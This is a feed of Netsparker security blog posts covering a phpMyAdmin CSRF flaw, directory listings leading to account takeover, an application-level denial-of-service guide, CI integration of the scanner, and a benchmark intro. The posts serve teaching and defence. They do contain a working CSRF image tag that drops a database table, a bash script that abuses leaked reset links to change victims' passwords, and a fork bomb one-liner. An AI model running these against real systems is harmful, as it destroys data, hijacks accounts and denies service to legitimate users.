Quantcast
Channel: Invicti
Viewing all 1027 articles
Browse latest View live

Netsparker's Weekly Security Roundup 2018 – Week 01

$
0
0

Table of Content

  1. The Impact of Meltdown and Spectre On the Web
  2. HTTP Verb Tampering and a phpMyAdmin Cross-Site Request Forgery

The Impact of Meltdown and Spectre On the Web

In January 2018, the discovery of two high-profile vulnerabilities in modern processors was disclosed by spectreattack.com. They were given the names Spectre and Meltdown. The researchers who discovered them worked at Google's Project Zero, various universities and even a private IT security company.

Both vulnerabilities are caused by problems that arise due to the use of speculative execution, a technique modern processors employ for performance improvements. The impact of both is devastating. They enable the theft of sensitive data, passwords and encryption keys from the memory of affected systems.

One major problem with these security flaws is that attackers can use them to read sensitive system memory, even if the code is executed inside a virtual machine (VM) or a sandboxed environment. This is why many companies are concerned about the sensitive applications they host in the cloud. If attackers manage to run code on the same server, which is often the case in shared environments, they can steal encryption keys and passwords from otherwise secure applications.

The Impact of Meltdown and Spectre On the Web

However, it turns out that attackers don't actually have to execute a binary on an affected system to abuse the vulnerabilities. They can also be triggered by malicious javascript code in a user's browser. This means that any malicious website can read the private data.

But it gets worse if you think about the implications. You don't actually have to visit a shady website in order to get hacked. The code may be placed on a web application you regularly visit, if it is vulnerable to stored cross-site scripting (XSS). While the usual goal of XSS is to bypass the same origin policy (SOP), in this case, an attacker wants to reach a variety of users with little effort. That makes stored XSS such an appealing attack vector.

While an attacker can also use reflected XSS, it's less useful in this case. If an attacker can make a user click a suspicious link, he may as well host the payload on his own server. If you own a website, you should take the same precautions as with a classic XSS attack. Use a strong content security policy (CSP) as well as context-dependent encoding in order to make sure that your site's visitors are secure.

HTTP Verb Tampering and a phpMyAdmin Cross-Site Request Forgery

A vulnerability was discovered in phpMyAdmin, a popular database management tool written in PHP that has been developed for about 18 years now. This particular security flaw, found by Ashutosh Barot, affects versions v.4.7.x prior to 4.7.6.1/4.7.7. It is a Cross-Site Request Forgery (CSRF) vulnerability that allows an attacker to execute actions on behalf of legitimate users, merely by making them open a malicious link.

In order to understand the vulnerability, it is important to look at the message at the top of the commit that introduced the flaw.

Message at the top of the commit that introduced the flaw.

This commit is based on the assumption that GET requests are (correctly) used to execute actions that don't result in a state change. In other words, the GET requests only retrieve data, but do not modify or delete it. It turns out, however, that this wasn't exactly true.

While there was code that checked for matching CSRF tokens sent via POST requests, it didn't take GET requests into account. It just didn't seem necessary for the above-mentioned reasons.

This was a problem though, since HTTP verb tampering was possible for these methods. What is HTTP verb tampering? Whenever your browser sends a request to a web server it sends an HTTP verb.

GET

/

HTTP/1.1

verb

path

protocol version

Applications often decide which action to take based on the HTTP verb. As mentioned already, GET is only designed to retrieve data. For a short period, this was the only available verb. Later, others were added, such as POST, which can be used to change or create data on the server. Other common verbs with different meanings include: PUT, DELETE and OPTIONS.

Sometimes, developers don't check which HTTP verb is used. PHP even has a predefined variable, that consists either of GET or POST variables, depending on the verb. It's called $_REQUEST and is often used when both GET and POST requests would lead to the same action on the server side. This makes it significantly harder to use the correct verb, and can easily lead to HTTP verb tampering.

Imagine that there is a CSRF token check that only works when the request method is POST. This example illustrates what such a check might look like:

<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        // Check if request is valid
        if($_POST["token"] != $_SESSION["csrf_token"]) {
                exit("Invalid token!");
        }
}
$username = $_REQUEST["username"];
$password =  $_REQUEST["password"];
write_user_to_db($username, $password);
?>

The problem is that $_REQUEST doesn't only accept POST requests; it can also be used with GET. This means that the CSRF token check will never run, but the rest of the code will. In this example, HTTP verb tampering bypassed the check.

Applications are vulnerable when these conditions are met:

  • There is a security check for a specific HTTP verb only
  • Requests are not discarded if other verbs, are used and the parameters will still be used by the application
  • Additionally, it may accept arbitrary verbs

There is a similar problem with the phpMyAdmin vulnerability. Whenever a legitimate user clicks Drop Database, the following URL will be called:

http://example.com/pma/sql.php?ajax_request=true&token=b6a6527a5805591d544fb66c84f30faf&server=1&get_default_fk_check_value=true&_nocache=1515335432843146723

As you can see, there is a CSRF token. This request will create a popup, as illustrated, that prompts you to confirm your action.

As you can see, there is a CSRF token. This request will create a popup, as illustrated, that prompts you to confirm your action.

However, once you click OK, another request is issued. This time it is a POST request, and it will delete the selected table.

The screenshot clearly shows that the application uses a POST request with a CSRF token.

The screenshot clearly shows that the application uses a POST request with a CSRF token. What we can do now is simply issue a GET request with the same parameters. If the application is vulnerable to HTTP verb tampering, it will execute the action without reference to the correct CSRF token, since the check doesn't run for POST requests.

It works. An attacker can carry out this attack with an image tag like this:

<img src="http://example.com/pma/sql.php?db=one&goto=db_structure.php&table=test&reload=1&purge=1&sql_query=DROP+TABLE+%60test%60&message_to_show=something" >

This serious vulnerability was fortunately fixed in the latest version of phpMyAdmin. If you use a version prior to the ones mentioned above, it's time to update your installation.


Netsparker's Weekly Security Roundup 2018 – Week 02

$
0
0

Table of Content

  1. Directory Listings Can Lead Directly to Account Takeover
  2. Are US Government Websites Accessible and Secure?
  3. AlwaysOnSSL – A New, Free Certification Authority

Directory Listings Can Lead Directly to Account Takeover

Directory listings are one of the most frequently encountered issues in the Information Leak category. They occur when developers fail to properly configure their web servers. As with our other web security warnings, let's not underestimate this one!

This week, we examine an experiment carried out by Nishaanth Guna, a 22 year old Security Researcher who previously worked with AppKnox and Ernst & Young. Guna has blogged about a straightforward way to use Directory listings to achieve account takeover. He'd encountered one during one of his penetration tests.

He started his penetration test by enumerating the subdomains of his target domain by searching for them in the Certificate Transparency logs. He used the following short and elegant bash script to conveniently query the crt.sh website from his command line:

[nishaanthguna:~/essentials]$ curl --silent https://crt.sh/\?q\=%.domain.com | sed 's/<\/\?[^>]\+>//g' | grep -i domain.com | tail -n +9 | cut -d ">" -f2 | cut -d "<" -f1

This is the list of domains his script returned:

  • www.domain.com
  • blog.domain.com
  • stag.domain.com

Guna performed a port scan of all the domains he found and noticed that one of them had port   8080 exposed. Much to his surprise the subdomain in question returned, a list of directories and files.

One of them was called mailgun-webhook.log and was used by the administrator to store the results of Mailgun's webhook requests. Webhooks are endpoints to which programs or websites can send notifications, in case a specific prerequisite is satisfied. Mailgun can send a notification to a webhook whenever the user clicks the link, when there is a spam complaint or when a user opts out of receiving further emails.

So, what's the problem?

The bad news is that this log file contains not only email addresses, but also password reset links. Guna even wrote a script in bash, that would request a password reset link and then automatically set the victim's password to 'testpassword!!'.

curl https://domain.com/mailgun-webhook.log | tee direct.txt
if grep -Fxq "reset" direct.txt
then
 echo "[+]Found a Password Reset link"
 link=$(cat direct.txt | grep -i reset | cut -d "," -f6  |
 cut -d "\\" -f1 | head -n 1)
 curl '$link'-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)'
 --data 'password=testpassword%21%21&confirmation=testpassword%21%21' --compressed
 echo "[+]Password changed to testpassword!!"
else
 echo "[-]Reset link not found"
fi

Our recommendation is that you turn off the Directory listing feature, and move log files that contain sensitive data out of the public directory (for the reasons illustrated in Guna's experiment).

For further information on Guna's security research, see Directory Listing to Account Takeover.

Are US Government Websites Accessible and Secure?

A report published by the Information Technology and Innovation Foundation (ITIF) in November 2017 found that 91% of websites used to access US information and services have speed and connection issues, and lacked both a user-friendly mobile interface and basic security precautions. The report was based on an examination of 4500 websites from 400 different domains, and the top 500 most popular websites were included in the research.

In March the same year, they published their research on the 300 most popular websites. The results highlighted that many government websites are slow, lack a user-friendly mobile interface, and suffer from accessibility problems and security issues.

By the time the November report was published, ITIF was able to incorporate their research into the progressions on the 300 government sites. Their findings were as follows:

  • Their security investigation was based on only two criteria: DNSSEC and HTTPS implementation. They found that 71%  of the sites passed SSL implementation, an increase from the 67% reported in March.
  • Eighty percent of the sites were DNSSEC-enabled. This represents a decline from 90% in March.
  • An index called Majestic Million is used instead of the Alexa Top list. While Alexa collects data from the Alexa Toolbar, Majestic Million (a reverse search engine) claims that their page rank estimations are based on backlinks (https://majestic.com/reports/majestic-million).
  • According to the report, 70% of government sites included in the research used SSL, while 8% did not. In addition, they found also that older and insecure versions of SSLv3 were used, cryptographic attacks such as POODLE and DROWN were possible, and some sites did not use perfect forward secrecy.

For further information about this research, see Benchmarking US Government Websites.

AlwaysOnSSL – A New, Free Certification Authority

AlwaysOnSSL – A New, Free Certification Authority

We're all familiar with Let's Encrypt, a certificate authority (CA) that provides free TLS certificates. It plays an important role in the increase of secure connections, just like a new CA called AlwaysOnSSL. AlwaysOnSSL, provided by CertCenter (who sell Symantec and DigiCert certificates) is based in Germany. They similarly offer free TLS certificates.

So, what's the difference between the two?

  • At first glance, the most noticeable difference is that Let's Encrypt certifications signs certificates for a period of three months, if you use your own CSR file. AlwaysOnSSL, on the other hand, signs certificates for up to 12 months.
  • Let's Encrypt does not offer options for creating certificates from a web interface. This is only possible by integrating third party services into Let's Encrypt, such as https://www.sslforfree.com/. However, with AlwaysOnSSL, you can easily create certificates from the website.
  • It's important to note that there is an option to create private keys via the web UI in AlwaysOnSSL. However, in Let’s Encrypt, this process is carried out on the client side. Creating a private key on a third party service is risky. In addition, the feature that provides uploading your Certificate Signing Request (CSR) file has recently been added to the options offered by AlwaysOnSSL. Ownership is verified with a DNS Entry or file upload, methods used by other services. When choosing the DNS entry option, you have to create a TXT entry in the domain's DNS records. Once the necessary conditions are met, signing (certification) happens within minutes.

Application Level Denial of Service – A Comprehensive Guide

$
0
0

Denial of Service attacks that bring down popular websites often involve thousands of hacked consumer devices and servers. While these attacks mainly aim to overwhelm the target system with traffic, in order to deny service to legitimate users, bugs at the Application Layer (Layer 7 in the OSI model) can have the same effect.

Application Level Denial of Service (L7 DoS) errors are often tough to identify and sometimes even tougher to prevent. This guide aims to highlight the different techniques that will help you find out what to look for and where DoS conditions may occur.

Table of Content

  1. Random Access Memory (RAM)
      1. Recursion
      2. Tricking an Application Into Allocating a Huge Amount of Memory
  2. Other
  • Central Processing Unit (CPU)
      1. Recursion
      2. Abusing Resource-Intensive Operations
  • Disk Space
  • Exhaust Allocated Resources for a Single User
  • Logic-Based Denial of Service
  • Basic Tips and Tricks to Identify & Prevent Application DoS Attacks
  • Random Access Memory (RAM)

    In order to function properly, applications need a certain amount of available RAM. While it's possible to deal with the system not being able to allocate new memory, most of the time the application will either hang or crash, both of which will result in a DoS scenario.

    Recursion

    Recursion is a common reason for L7 DoS attacks. It refers to a procedure that causes itself to repeat over and over again. In most cases, this is a controlled process and a valid technique in programming. However, in the case of L7 DoS, it's the result of a small set of instructions whose execution prompts vulnerable applications to enter a resource-intensive loop, with the specific purpose of exhausting their resources.

    This table lists examples that involve a system's volatile memory.

    Recursive File Inclusion

    What to look out for

    Here is an example of PHP code:

    include('current_file_name.php');

    PHP allocates new memory for each inclusion, and repeats the process until there is no memory left. When running the code in Command Line Interface (CLI) mode, there is no check to break this loop. However mod_php for Apache has a safety switch that aborts script execution if it detects too many repetitions. In addition, it throws an internal server error. However, a multithreaded script running on a single machine can query the page repeatedly, leading to the same end result – PHP running out of memory. This behaviour may also apply to other programming languages.

    Where it is found

    This kind of vulnerability can be found in places where a traditional Local File Inclusion (LFI) vulnerability might occur. However, because it doesn't need to traverse directories and its PHP extension, it affects otherwise non-exploitable LFIs.

    Zip Bombs

    What to look out for

    In the early 2000s, ZIP bombs were emailed to unsuspecting victims in order to crash their personal computers or mail servers. Ironically, this was often the fault of the system's antivirus program's automated extraction of the archive (in order to scan it), not that of the user opening it. Now, most antivirus vendors would either detect ZIP bombs or avoid extracting them completely. Briefly, some file compression algorithms work by replacing recurring patterns in the file with short references to a single occurance of the pattern. Let's say that instead of writing 'AAAAAAAAAAAAAAAA', you could write '1-16-A' to display the character 'A' sixteen times at position 1. Replace '16' with '999999999', and you'll understand why a relatively small file can consume all the RAM or disk space once extracted. One famous example of a ZIP bomb is 42.zip, which is just 42 kb in size, but increases to 4.5 petabytes (approximately the size of 1.125 billion MP3 files). Even though it is called a ZIP bomb, it can be applied to similar formats.

    Where it is found

    Web applications that allow you to upload compressed files, and extract the content for you, might be susceptible to such an attack, particularly if the application (or or the library that handles the decompression) fails to conduct a proper inspection of the deflated file.

    Billion Laughs Attack

    What to look out for

    This attack is a classic example of a relatively small set of instructions that leads to the generation of a massive amount of data once it is parsed. This is how it works. A first, a single entity is created. In most available examples, it's called lol and its sole content is the word 'lol'. Then another entity is created, called lol1. This entity contains ten references to the first lol entity. The entity lol2 contains ten references to lol1 and so on. This is repeated several times. If the parser expands all the entities, it will reach size of 109 'lols' – one billion laughs.

    Where it is found

    You may encounter this vulnerability wherever an application accepts input formatted as XML and parses it on the server side. Various examples are available online, one of them on the linked wikipedia page.

    Tricking an Application Into Allocating a Huge Amount of Memory

    Sometimes applications can decide how much memory they need to allocate just by looking at file headers or serialized strings. If an attacker manages to manipulate these indicators, the application can be tricked into allocating large chunks of memory with very little effort.

    Deserialization Vulnerabilities

    What to look out for

    Deserialization is a delicate topic and you should generally not deserialize user supplied input using functions that are not explicitly recommended as safe alternative to raw deserialization functions. However, depending on their implementation, even those functions may contain bugs that lead to a DoS condition. It might be possible to pass a string to a deserialization function that instructs the parser to allocate large chunks of memory (for example by using repeating nested array definitions as seen in the linked paper about various PHP vulnerabilities). A wide range of programming languages with a similar functionality, in addition to PHP, can be vulnerable.

    Where it is found

    Deserialization vulnerabilities may be found everywhere user input is accepted. Most of the time you can see where serialized strings are accepted by using the application normally and intercepting the traffic with a tool like Fiddler.

    Manipulating File Headers to Allocate Large Memory Chunks

    What to look out for

    The HackerOne example illustrates a hacker manipulating file headers to allocate large memory chunks. Using a 260px * 260px jpg file, the researcher manipulated the file header in order to make it appear as if the image was 64250px * 64250px in size. This relatively small file eventually led to a DoS condition on HackerOne, and apparently on the researcher's local image viewer. This happened because the application allocated a large amount of memory, ran out of RAM, swapped to disk and eventually denied service altogether.

    Where it is found

    This vulnerability might be found in places where computation is performed on an input file, and where the size of the file is saved in its header. This might include images and video files, and other file formats.

    Other

    Reading Infinite Data Streams

    What to look out for

    Reading infinite data streams using an LFI can create a DoS condition, where there is no check on the maximum readable amount of data. On Linux, the first choice for a data source would be either /dev/zero (infinite stream of NULL-bytes) or /dev/urandom (infinite stream of random data). In both cases, enough memory would be allocated to crash the application.

    Where it is found

    This vulnerability can be found in places where a user can specify which data is either read from the file system or from a remote server. As mentioned above, on the local Linux system, /dev/zero or /dev/urandom are the prefered options. For remote files, this 1TB speed test file is a suitable target.

    Central Processing Unit (CPU)

    The CPU is responsible for the execution of the instructions you write into your program. Depending on the task, the CPU may have relatively little work to do; alternatively, it may require large amounts of computing power. Work-intensive tasks may even tie up all of the CPU's resources and render the system unresponsive.

    Recursion

    Recursion is not only a matter of RAM. If the CPU is forced to repeat a resource-intensive task, it will stop responding to subsequent requests until the task is finished. There are a few attacks that abuse this fact.

    reDoS

    What to look out for

    reDoS (Regular Expression Denial of Service) was put under the spotlight in 2016 when it caused stackoverflow.com to go offline for just over 30 minutes. It wasn't the fault of an attacker, but a user who included 20,000 whitespace characters in a code snippet. According to the write-up, the regular expression was written in such a way that it forced the system to check the 20,000 character string in 200,010,000 steps (20,000 + 19,000, + … + 2 + 1). There are more details in both the OWASP page and the the Stackoverflow blog post, but other sites also provide a useful examination of the issue.

    Where it is found

    If a web application allows you to input your own regex code, it might be possible to execute the above-mentioned attack. In older versions of PHP, it might even lead to remote code execution.

    SQL Injection Wildcard Attack

    What to look out for

    An SQL injection wildcard attack works in a similar way to a plain reDoS. The key difference is that it doesn't just use the usual regular expression syntax, but employs so-called 'wildcards' that are used by databases to find data matching a specific description. These attacks can either be carried out using an (otherwise not vulnerable) search functionality, or via an attack vector, where it's possible to execute SQL statements, for example with an existing SQL injection vulnerability.

    Where it is found

    Due to the nature of the vulnerability and the affected SQL functions, it can often be found in search functionality. To learn more about how such attacks are conducted, see the linked paper.

    Fork Bombs

    What to look out for

    Fork bombs are processes that duplicate themselves over and over again until they use up all of the system's resources. Both the CPU and the process table are affected. They acquired their name from the fork system call that they use. Perhaps the most commonly-known fork bomb is the following shell command: :(){ :|:& };:. This shows that fork bombs use recursion as the : function calls itself over and over again. Fork bombs are rarely used in web application attacks.

    Where it is found

    This attack would be conducted in a sandboxed environment that allows code execution of some sort, without giving an attacker access to sensitive data. Otherwise an attacker might decide to use the code execution for malicious purposes that are worse than a Denial of Service attack.

    Abusing Resource-Intensive Operations

    It is often possible for a user to instruct the server to execute a resource-intensive set of instructions. These don't necessarily involve recursion. Instead, they are often CPU-hungry operations, that are either designed to be ineffective or require a large amount of computing power to carry out the instructions.

    Abusing Password Hashing Functions

    What to look out for

    Why would anyone purposefully design a set of instructions that take a long time to execute and require a lot of computing power? One possible application is abusing password hashing functions. The reason is simple. Modern password hashing functions are designed to be ineffective, which is achieved by so-called 'key stretching'. They need a lot of time and resources to return the desired output. This is intentional because it slows down attackers that are trying to find the passwords belonging to those hashes. This property distinguishes these algorithms from the ones used in other kinds of hashing functions. These are generally designed to quickly return checksums for large files.

    Where it is found

    Attackers could abuse this fact to achieve a DoS attack, if they submitted a huge amount of long passwords to the hashing function. Depending on the cost factor and server hardware, this could easily lead to a DoS.

    Headless Browser SSRF

    What to look out for

    Headless browsers are sometimes used to visit user-supplied websites and easily render the DOM, in order to take a screenshot of the page that was submitted. There are several vulnerabilities that can arise when using such a setup, such as the disclosure of local file contents or a classical Server Side Request Forgery vulnerability that allows interaction with services behind your firewall. But even if those obvious flaws are considered, it is still possible to exhaust the server's resources by instructing it to parse JavaScript code that was placed on your website. This might lead to a DoS condition.

    Where it is found

    Code that leads to a high CPU load might be JavaScript-specific reDoS or even cryptocurrency mining, the latter being limited by the hardware in use and connection timeouts.

    Disk Space

    Most programs need more than simply a CPU and volatile memory in order to operate. They also need to be able write to disk so that they can store information. The generated files are used for caching, configuration or in order to write to disk in case RAM space is tight. Programs may crash or act unpredictably and whole systems can become unstable.

    Uploading Large Files

    What to look out for

    Arguably the most obvious way to fill a system with data is by uploading large files to the server. If the application doesn't apply proper rate-limiting and size checks for its file upload functionality, an attacker can upload random junk data to the system until it can no longer store any more data. This either makes the file upload functionality fail for legitimate users, or can make the entire system unstable.

    Where it is found

    Profile picture upload functionality, while ubiquitous, is fortunately unsuitable for this type of attack because previous uploads are deleted once a user uploads a new image. Instead, this can be achieved by uploading files in private messages or in bug reports or help desk applications.

    Generating a Huge Amount of Databases or Log Files

    What to look out for

    In the early days of non-relational databases, NoSQL injections could easily be used to execute arbitrary JavaScript on the vulnerable server. Nowadays however, the available JavaScript functions are greatly reduced and run in a sandboxed environment. Nonetheless it's still possible to wreak havoc with the whitelisted JavaScript functions, should an attacker achieve code execution. It's possible to either use one of the above-mentioned techniques to exhaust all the available RAM or utilize reDoS to bind all the available CPU resources. However, it's also possible to write into the log files using server side JavaScript. This results in generating a huge amount of databases or log files, if an attacker writes to it in a continuous loop.

    Where it is found

    Often this attack can be conducted either by directly searching for server side JavaScript injections or by using features such as MongoDB's $where.

    Arbitrary File Deletion

    What to look out for

    The deletion of arbitrary files is a completely different DoS approach. Using an arbitrary file deletion vulnerability, an attacker can remove data that is necessary for the application in order to work correctly. This may include removing configuration files or even script code in order to deny service to legitimate users.

    Where it is found

    Where to find such a vulnerability is highly application-specific. But it often involves directory traversal.

    Exhaust Allocated Resources for a Single User

    On applications or services that allow multiple users, resources are limited and have to be allocated in a fair way. Users can only use a certain amount of available space. It's easy for attackers to fill that space, and deny service for one specific user.

    Email Bomb

    What to look out for

    Users are regularly allocated a small amount of space for their inbox. The goal of an Email Bomb is to flood a user's inbox to the point where all available space is exhausted, and subsequent (legitimate) emails bounce.

    Where it is found

    Attackers can abuse this flaw by sending a moderately large amount of emails with large attachments. After a short time, the mailbox is full and new emails are rejected. While it should be easy to fill a victim's inbox if space is tight, there is an attack called List Linking that addresses targets with larger inboxes. An attacker registers the victim for various, high-frequency mailing lists and lets them spam the inbox.

    Free Website Restrictions

    What to look out for

    Some web hosts allow only a certain amount of requests per day for users on free subscriptions. If the amount of requests exceeds the maximum limit, the page becomes unavailable for a certain amount of time, except if the user pays for a subscription.

    Where it is found

    It is relatively easy to trigger this maximum limit by querying the site in a continuous loop, using a tool like cURL. There are only two lines needed in order to create a valid HTTP 1.1 request.

    Cash Overflow

    What to look out for

    A similar approach is called Cash Overflow. Instead of targeting disk space, RAM or the CPU, the attack aims to raise the bill for a service up to the point where it exceeds the allocated amount of money. Should the owner of the website be unable to pay the bill or if automatic payment fails, the service will be terminated – effectively leading to DoS. This can happen if an external service is used that bills the user a certain amount of money per request.

    Where it is found

    Since these requests are generally inexpensive, an attacker needs to generate huge amounts of traffic in order to achieve DoS.

    Logic-Based Denial of Service

    A DoS for specific users might have legitimate reasons – either to enforce rate limiting or to deny access for malicious users. Like every other piece of code, this functionality can contain bugs. And sometimes the application can be tricked into denying service to specific, legitimate users.

    X-Forwarded-For

    What to look out for

    Hackers can use a well-known trick, to overcome IP-based rate limiting or blocks, if the application incorrectly uses headers like X-Forwarded-For in order to determine users' IP addresses. It's easy to forget that this flawed implementation also opens the door for a DoS attack, if the IP address of a legitimate user is used instead of a random one for example. Attackers may constantly trigger rate limiting, with an X-Forwarded-For header containing the victims' IP address. If victims can't mask or change their IP address, they are denied service for the duration of the attack.

    Where it is found

    This flaw can be found on any application protected by a web application firewall (WAF), or any application that applies rate limiting as long as either of these measures can be bypassed using X-Forwarded-For.

    Web Application Firewalls

    What to look out for

    Many web application firewalls can be configured to block users that send malicious requests, for a certain amount of time. Those requests may contain specific, special characters like backticks and single quotes or blocked keywords such as script and passwd. An attacker can set up a page that will send such requests to a WAF-protected website, or in other words, trigger the DoS condition through CSRF. Once it sees the request coming from the victim's IP, it will automatically block it for a certain amount of time. The same works if the attacker is able to set a cookie with a blocked keyword.

    Where it is found

    This can be found wherever a WAF is protecting the application and users are blocked in the event of malicious keyword detection.

    Wasting the Available Password Attempts

    What to look out for

    Preventing attackers from bruteforcing the credentials of legitimate users is difficult. Often this problem is solved using a captcha. But sometimes developers resort to blocking the account after a certain amount of wrong login attempts. If an attacker wastes all of the login attempts for a specific user, either accidentally while brute forcing or on purpose, the affected user will be denied access as well.

    Where it is found

    This vulnerability can arise wherever there is a limited amount of password attempts per user, rather than per IP address or session. Sometimes applications will send a link to the victim in order to unblock the account again. This should be tested to avoid false positives.

    Cookie Bombs

    What to look out for

    If an application endpoint allows the generation a big amount of cookies (a cookie bomb) with different names, an attacker can instruct the victim's browser to store and send enough cookies in order to exceed the allowed request size. This will eventually lead to a denial of service condition that can only be fixed by deleting all the malicious cookies.

    Where it is found

    As mentioned above, the application must have cookies with different names in order for this to work. The attack would be triggered via CSRF.

    Basic Tips and Tricks to Identify & Prevent Application DoS Attacks

    • You don't generally need to receive the request responses when conducting a DoS attack. If you want to test for Denial of Service conditions yourself, we recommend that you use HEAD instead of GET requests where possible, or use the Range header with a value of 'bytes=0-0'
    • Certain methods of error handling are resource-intensive. If you encounter a verbose error, this might indicate that there is a large amount of computing power involved. For example, stack traces are known to be resource-intensive.
    • A small amount of input that leads to an exceptionally large return value is always a good place to look for DoS, especially if recursion is involved.
    • Whenever you encounter a DoS error, you should consider whether this is the worst impact the vulnerability might have. If there is an Local File Inclusion, try to read sensitive information rather than recreating a DoS. And if you can issue a limited set of commands, try to escape from the sandbox and turn it into a full RCE, instead of wasting the system's resources. This helps to more accurately calculate the risk for the developers to which you report the flaw. Should you submit your findings to a bug bounty program, it is also likely to lead to a more lucrative payout.

    If we neglected to mention something you think is important, or if you have another idea about where a DoS condition might occur, please tweet us your suggestions and tricks.

    How to Integrate Netsparker with Jenkins

    $
    0
    0

    Jenkins provides an open source automation server that supplies plugins that support the development of software projects. If you already use Jenkins to automate tasks, you can integrate the Netsparker web application security scanner with Jenkins. This enables you automate Netsparker Desktop scans and export Netsparker reports. These automated Netsparker tasks are then displayed in the Jenkins UI.

    Jenkins Logo

    This article explains how to run scans automatically and export reports from Netsparker via Jenkins.

    How to Automate Scans and Export Reports From Netsparker via Jenkins
    1. Once you have installed Jenkins, open the Jenkins web user interface. The Jenkins web interface can be reached at: http://127.0.0.1:8080/. This window is displayed.

    Once you have installed Jenkins, open the Jenkins web user interface. The Jenkins web interface can be reached at: http://127.0.0.1:8080/. This window is displayed.

    1. In the Enter an item name field, type your project name.
    2. Select Freestyle project as the type.
    3. Click OK. The Config window is displayed.

    Select Freestyle project as the type. Click OK. The Config window is displayed.

    1. Click the Build Environment tab.
    2. From the Add build step dropdown, select Execute Windows batch command. The Execute Windows batch command panel is displayed.

    Click the Build Environment tab. From the Add build step dropdown, select Execute Windows batch command. The Execute Windows batch command panel is displayed.

    1. In the Command field, enter the following command:

    cd C:\Program Files (x86)\Netsparker netsparker.exe /a /url http://php.testsparker.com/ /rt "Detailed Scan Report" /r "C:\Program Files(x86)\Jenkins\workspace\netsparker-scan\report_phptestsparkercom.html"

    In this command, the value 'Detailed Scan Report' given to the rt parameter on the command line, is taken from the template names contained in the C:\Users\{USERNAME}\Documents\Netsparker\Resources\Report Templates directory.

    If any of the template names from this screenshot was included in the command, instead of ''Detailed Scan Report", a report will be generated according that template instead.

    If any of the template names from this screenshot was included in the command, instead of ''Detailed Scan Report", a report will be generated according that template instead.

    Read the Netsparker Desktop Command Line Interface and Arguments for more detailed information about the parameters that you can use when running Netsparker Desktop via command line.

    1. Click Save to save the project.
    2. This screenshot shows a Console Output window after the created task runs.

    This screenshot shows a Console Output window after the created task runs.

    This screenshot shows a Workspace that is created after the task runs.

    This screenshot shows a Workspace that is created after the task runs.

    How to Integrate Netsparker Desktop with GoCD

    $
    0
    0

    GoCD is continuous delivery software similar to Jenkins. GoCD enables you to build automation into your software development workflow, including testing, bug fixing, web security scanning and vulnerability fixing.

    This article explains how to integrate Netsparker web application security scanner with GoCD, in order to trigger scans automatically when developers make changes to your web applications.

    Why Integrate Netsparker Desktop with GoCD?

    In software development projects, Developers, Testers and Penetration Testers all have their role to play. When Developers make changes to web applications for example, these changes have a knock-on impact on other teams and tasks.

    If the changes that are made by Developers can be used to trigger automatic scans, this saves the time required to manually configure and run scans, examine results, then assign and fix vulnerabilities. Development teams can continue to work on the areas to which they have been assigned, without having to switch tasks. Those assigned to vulnerabilities can view scans as they are running. And, often scans can run while developers are otherwise occupied or away from work. No-one has to wait for a scan to complete before moving on to another task or back to their previous development tasks.

    Integrating GoCD with Netsparker

    There are two steps in this procedure:

    1. Adding the Netsparker’s installation directory to PATH environment variable of the operating system.
    2. Creating a Custom Command Task on GoCD.

    Adding Netsparker’s Installation Directory to the PATH Environment Variable

    You need to add Netsparker’s installation directory to your OS's PATH environment variable on every machine on which you use Netsparker Desktop.

    How to Add Netsparker's Installation Directory to the PATH Environment Variable
    1. From your PC's desktop, right-click This PC, then click Properties. The Properties window is displayed.

    From your PC's desktop, right-click This PC, then click Properties. The Properties window is displayed.

    1. Click Advanced System Settings. The System Properties dialog is displayed with the Advanced tab open.
    2. Click Environment Variables. The Environment Variables dialog is displayed.

    Click Environment Variables. The Environment Variables dialog is displayed.

    1. From the System variables panel, click Path, then Edit. The Edit environment variable dialog is displayed.

    From the System variables panel, click Path, then Edit. The Edit environment variable dialog is displayed.

    1. Click New, then enter Netsparker’s installation directory path (the default is 'C:\Program Files(x86)\Netsparker')', and click OK.
    2. Click OKto close all remaining dialogs.

    Creating a Custom Command Task on GoCD

    Once you create a Custom Command Task on the GoCD and the required fields are completed, when the task runs, it automatically scans with Netsparker and saves the formatted reporting file, Detailed Scan Report.

    How to Create a Custom Command Task on GoCD
    1. Open GoCD.

    Open GoCD.

    1. From the Pipelines window, click the round settings button next to the pipeline you want to edit. The Quick Edit window is displayed.

    From the Pipelines window, click the round settings button next to the pipeline you want to edit. The Quick Edit window is displayed.

    1. Click the Stages tab and click on the relevant stage. The Stage window is displayed.

    Click the Stages tab and click on the relevant stage. The Stage window is displayed.

    1. Click the Jobs tab, and click on the relevant job. The Job window is displayed.

    Click the Jobs tab, and click on the relevant job. The Job window is displayed.

    1. Click the Tasks tab, then click Custom Command. The Edit Custom Command task window is displayed.

    Click the Tasks tab, then click Custom Command. The Edit Custom Command task window is displayed.

    1. In the Command field, enter:

    netsparker.exe

    1. In the Arguments field, enter the following code:

    /a
    /url
    http://php.testsparker.com/
    /rt
    "Detailed Scan Report"
    /r
    "C:\Program Files (x86)\Go Agent\pipelines\report_phptestsparkercom.html"

    1. Click Save.

    Report Templates Directory

    The rt parameter in the command line, in the instructions in How to add Netsparker's Installation Directory to the PATH Environment Variable, is given the value 'Detailed Scan Report'.

    This value is taken from the template names contained in the Report Templates directory (C:\Users\{USERNAME}\Documents\Netsparker\Resources\Report Templates). You can substitute the name of any other report template, to generate a different report at the end of the scan.

    Report Templates Directory

    For further information about parameters, see Netsparker Desktop Command Line Interface and Arguments.

    2018 Web Vulnerability Scanners Comparison – Netsparker Confirmed a Market Leader

    $
    0
    0

    The 2018 independent web application security scanners benchmark results have been published. How did Netsparker fare when compared to the other web vulnerability scanners?

    In short, Netsparker was:

    • The only scanner that identified all the vulnerabilities
    • One of the only two scanners that did reported zero false positives

    None of the other scanners in the comparison performed as well as Netsparker. If you'd like to find out more information, including results, read this post which explains how the tests were conducted and displays the results of each individual test.

    Table of Content

    1. What is the Web Application Security Scanner (DAST) Benchmark?
        1. How Are Tests Performed?
        2. The Negative Impact of False Positives
        3. False Positives Make Scaling Up Web Security Impossible
        4. Evaluation Criteria
    2. The Benchmark Results – Global Results
        1. How Many Vulnerabilities Did the Scanners Detect?
        2. How Many False Positives Were Reported?
        3. Graph with Global Detection & False Positives Rates
    3. The Benchmark Results – Individual Tests Results
        1. OS Command Injection Detection
        2. Remote File Inclusion / SSRF
        3. Path Traversal
        4. SQL Injection
        5. Reflective Cross-site Scripting (XSS)
        6. Unvalidated Redirect
      • Are Web Security Scanner Comparisons Useful & Realistic?
          1. Which is the Best Web Application Security Scanner?
